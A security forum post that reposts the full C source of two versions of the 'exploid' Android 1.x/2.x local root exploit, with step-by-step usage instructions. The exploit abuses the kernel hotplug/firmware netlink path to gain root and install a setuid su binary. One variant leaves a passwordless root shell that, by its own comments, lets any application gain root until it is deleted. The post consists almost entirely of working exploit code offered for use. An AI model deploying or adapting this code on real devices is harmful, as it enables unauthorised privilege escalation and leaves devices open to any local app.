Jump to content
Nytro

Android 1.x/2.x Local Root Exploit

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Android 1.x/2.x Local Root Exploit

/* android 1.x/2.x the real youdev feat. init local root exploit.
 * (C) 2009/2010 by The Android Exploid Crew.
 *
 * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run.
 * Or use /data/local/tmp if available (thx to ioerror!) It is important to
 * to use /sqlite_stmt_journals directory if available.
 * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc}
 * or use USB keys etc. This will invoke hotplug which is actually
 * our exploit making /system/bin/rootshell.
 * This exploit requires /etc/firmware directory, e.g. it will
 * run on real devices and not inside the emulator.
 * I'd like to have this exploitet by using the same blockdevice trick
 * as in udev, but internal structures only allow world writable char
 * devices, not block devices, so I used the firmware subsystem.
 *
 * !!!This is PoC code for educational purposes only!!!
 * If you run it, it might crash your device and make it unusable!
 * So you use it at your own risk!
 *
 * Thx to all the TAEC supporters.
 */
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <signal.h>
#include <sys/mount.h>


#define SECRET "secretlol"


void die(const char *msg)
{
perror(msg);
exit(errno);
}


void copy(const char *from, const char *to)
{
int fd1, fd2;
char buf[0x1000];
ssize_t r = 0;

if ((fd1 = open(from, O_RDONLY)) < 0)
die("[-] open");
if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0)
die("[-] open");
for (;;) {
r = read(fd1, buf, sizeof(buf));
if (r < 0)
die("[-] read");
if (r == 0)
break;
if (write(fd2, buf, r) != r)
die("[-] write");
}

close(fd1);
close(fd2);
sync(); sync();
}


void clear_hotplug()
{
int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
write(ofd, "", 1);
close(ofd);
}


int main(int argc, char **argv, char **env)
{
char buf[512], path[512];
int ofd;
struct sockaddr_nl snl;
struct iovec iov = {buf, sizeof(buf)};
struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
int sock;
char *basedir = NULL;


/* I hope there is no LD_ bug in androids rtld :) */
/*if (geteuid() == 0 && getuid() != 0)
rootshell(env);*/

if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
die("[-] readlink");

if (geteuid() == 0) {
clear_hotplug();
/* remount /system rw */
//DROID 1 and Ally
//mount("/dev/block/mtdblock4", "/system", "yaffs2", MS_REMOUNT, 0);
//DROID X
//mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0);
//GALAXY S
mount("/dev/block/stl9","/system", "rfs", MS_REMOUNT, 0);
//Eris and HTC Hero
//mount("/dev/block/mtdblock3", "/system", "yaffs2", MS_REMOUNT, 0);
//copy("/sdcard/su","/system/bin/su");
//copy("/sdcard/Superuser.apk","/system/app/Superuser.apk");
copy("/data/data/com.unstableapps.easyroot/files/su","/system/bin/su");
copy("/data/data/com.unstableapps.easyroot/files/Superuser.apk","/system/app/Superuser.apk");
chmod("/system/bin/su", 04755);
chmod("/system/app/Superuser.apk", 04744);

for (;;);
}

//basedir = "/sqlite_stmt_journals";
basedir = "/data/data/com.unstableapps.easyroot/files";
if (chdir(basedir) < 0) {
basedir = "/data/local/tmp";
if (chdir(basedir) < 0)
basedir = strdup(getcwd(buf, sizeof(buf)));
}

memset(&snl, 0, sizeof(snl));
snl.nl_pid = 1;
snl.nl_family = AF_NETLINK;

if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
die("[-] socket");

close(creat("loading", 0666));
if ((ofd = creat("hotplug", 0644)) < 0)
die("[-] creat");
if (write(ofd, path , strlen(path)) < 0)
die("[-] write");
close(ofd);
symlink("/proc/sys/kernel/hotplug", "data");
snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
        "SUBSYSTEM=firmware%c"
        "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
printf("[+] sending add message ...\n");
if (sendmsg(sock, &msg, 0) < 0)
die("[-] sendmsg");
close(sock);
sleep(3);
return 0;
}

Sursa: Android 1.x/2.x Local Root Exploit

Android 1.x/2.x HTC Wildfire Local Root Exploit

/* android 1.x/2.x the real youdev feat. init local root exploit.
 *
 *
 * Modifications to original exploit for HTC Wildfire Stage 1 soft-root (c) 2010 Martin Paul Eve
 * Changes:
 * -- Will not remount /system rw (NAND protection renders this pointless)
 * -- Doesn't copy self, merely chmods permissions of original executable
 * -- No password required for rootshell (designed to be immediately removed once su binary is in place)
 *
 * Revised usage instructions:
 * -- Copy to /sqlite_stmt_journals/exploid and /sqlite_stmt_journals/su
 * -- chmod exploid to 755
 * -- Execute the binary
 * -- Enable or disable a hotplug item (wifi, bluetooth etc. -- this could be done automatically by an app that packaged this exploit) -- don't worry that it segfaults
 * -- Execute it again to gain rootshell
 * -- Copy to device (/sqlite_stmt_journals/) + chown/chmod su to 04711
 * -- Delete original exploid
 * -- Use modified Superuser app with misplaced su binary
 *
 * Explanatory notes:
 * -- This is designed to be used with a modified superuser app (not yet written) which will use the su binary in /sqlite_stmt_journals/
 * -- It is important that you delete the original exploid binary because, otherwise, any application can gain root
 *
 * Original copyright/usage information
 *
 * (C) 2009/2010 by The Android Exploid Crew.
 *
 * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run.
 * Or use /data/local/tmp if available (thx to ioerror!) It is important to
 * to use /sqlite_stmt_journals directory if available.
 * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc}
 * or use USB keys etc. This will invoke hotplug which is actually
 * our exploit making /system/bin/rootshell.
 * This exploit requires /etc/firmware directory, e.g. it will
 * run on real devices and not inside the emulator.
 * I'd like to have this exploitet by using the same blockdevice trick
 * as in udev, but internal structures only allow world writable char
 * devices, not block devices, so I used the firmware subsystem.
 *
 * !!!This is PoC code for educational purposes only!!!
 * If you run it, it might crash your device and make it unusable!
 * So you use it at your own risk!
 *
 * Thx to all the TAEC supporters.
 *
 */
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <signal.h>
#include <sys/mount.h>

void die(const char *msg)
{
    perror(msg);
    exit(errno);
}

void clear_hotplug()
{
    int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
    write(ofd, "", 1);
    close(ofd);
}

void rootshell(char **env)
{
    char pwd[128];
    char *sh[] = {"/system/bin/sh", 0};

    setuid(0); setgid(0);
    execve(*sh, sh, env);
    die("[-] execve");
}


int main(int argc, char **argv, char **env)
{
    char buf[512], path[512];
    int ofd;
    struct sockaddr_nl snl;
    struct iovec iov = {buf, sizeof(buf)};
    struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
    int sock;
    char *basedir = NULL, *logmessage;


    /* I hope there is no LD_ bug in androids rtld :) */
    if (geteuid() == 0 && getuid() != 0)
        rootshell(env);

    if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
        die("[-] readlink");

    if (geteuid() == 0) {
        clear_hotplug();

        chown(path, 0, 0);
        chmod(path, 04711);

        chown("/sqlite_stmt_journals/su", 0, 0);
        chmod("/sqlite_stmt_journals/su", 06755);

        return 0;
    }

    printf("[*] Android local root exploid (C) The Android Exploid Crew\n");
    printf("[*] Modified by Martin Paul Eve for Wildfire Stage 1 soft-root\n");

    basedir = "/sqlite_stmt_journals";
    if (chdir(basedir) < 0) {
        basedir = "/data/local/tmp";
        if (chdir(basedir) < 0)
            basedir = strdup(getcwd(buf, sizeof(buf)));
    }
    printf("[+] Using basedir=%s, path=%s\n", basedir, path);
    printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");

    memset(&snl, 0, sizeof(snl));
    snl.nl_pid = 1;
    snl.nl_family = AF_NETLINK;

    if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
        die("[-] socket");

    close(creat("loading", 0666));
    if ((ofd = creat("hotplug", 0644)) < 0)
        die("[-] creat");
    if (write(ofd, path , strlen(path)) < 0)
        die("[-] write");
    close(ofd);
    symlink("/proc/sys/kernel/hotplug", "data");
    snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
             "SUBSYSTEM=firmware%c"
             "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
    printf("[+] sending add message ...\n");
    if (sendmsg(sock, &msg, 0) < 0)
        die("[-] sendmsg");
    close(sock);
    printf("[*] Try to invoke hotplug now, clicking at the wireless\n"
           "[*] settings, plugin USB key etc.\n"
           "[*] You succeeded if you find /system/bin/rootshell.\n"
           "[*] GUI might hang/restart meanwhile so be patient.\n");
    return 0;
}

Sursa: Android 1.x/2.x HTC Wildfire Local Root Exploit

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...